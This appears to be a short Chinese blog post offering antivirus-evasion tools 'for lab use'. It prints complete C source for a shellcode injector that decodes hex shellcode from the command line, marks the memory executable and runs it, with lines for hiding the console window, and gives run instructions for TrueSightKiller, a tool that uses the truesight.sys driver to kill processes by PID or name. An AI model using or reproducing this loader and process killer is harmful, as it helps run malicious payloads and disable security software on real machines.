靶场专用免杀工具

工具
SimpleShellcodeInjector

代码

bash 复制代码
#include <stdio.h>
#include <Windows.h>
int main(int argc, char* argv[]) {
   // HWND hWnd = GetConsoleWindow();
   // ShowWindow( hWnd, SW_HIDE );
    unsigned int char_in_hex;
    char* shellcode = argv[1];
    unsigned int iterations = strlen(shellcode);
    unsigned int memory_allocation = strlen(shellcode) / 2; 
    for (unsigned int i = 0; i < iterations - 1; i++) {
        sscanf(shellcode + 2 * i, "%2X", &char_in_hex);
        shellcode[i] = (char)char_in_hex;
    }
    void* exec = VirtualAlloc(0, memory_allocation, MEM_COMMIT, PAGE_READWRITE);
    memcpy(exec, shellcode, memory_allocation);
    DWORD ignore;
    VirtualProtect(exec, memory_allocation, PAGE_EXECUTE, &ignore);
    (*(void (*)()) exec)();
    return 0;
}

TrueSightKiller

自行编译后,将truesight.sys与编译之后的exe放在同一目录下,以管理员权限运行cmd

-p 指定pid,-n指定进程名


相关推荐
剑胆凌锋2 小时前
等级保护测评工程师的困境
网络·安全·web安全·网络安全·职场和发展
山东科恩光电4 小时前
安全地毯是什么?它有哪几种主要类型和应用场景?
安全
程序员清风6 小时前
PydanticAI 实战:用类型安全构建可靠的 Python Agent
开发语言·python·安全
林伽一7 小时前
100 万输出词元与窄开放,前沿模型发布范式正在改写|2026年10月02日
人工智能·科技·安全·ai
悟天特斯8 小时前
安防一体化:从“孤岛式监控“到“全域联动“的楼宇安全体系
人工智能·安全
ccstuck9 小时前
AI安全系列:给最小 Agent 做提示注入测试
人工智能·安全·ai安全
赛博守夜人10 小时前
跨境业务与出海合规之三:母公司如何通过 IT 权限与财权 Token 实现穿透式管控?
安全
姜鱼问生12 小时前
uptime-kuma 从 docker run 迁移到 compose:数据卷的坑
安全·架构
Bruce_Liuxiaowei14 小时前
2026年10月第1周网络安全形势周报
安全·web安全
jimmyleeee14 小时前
大模型安全之三十八:AI 中的 DoS 攻击:当“拒绝服务”变成“拒绝钱包”
人工智能·安全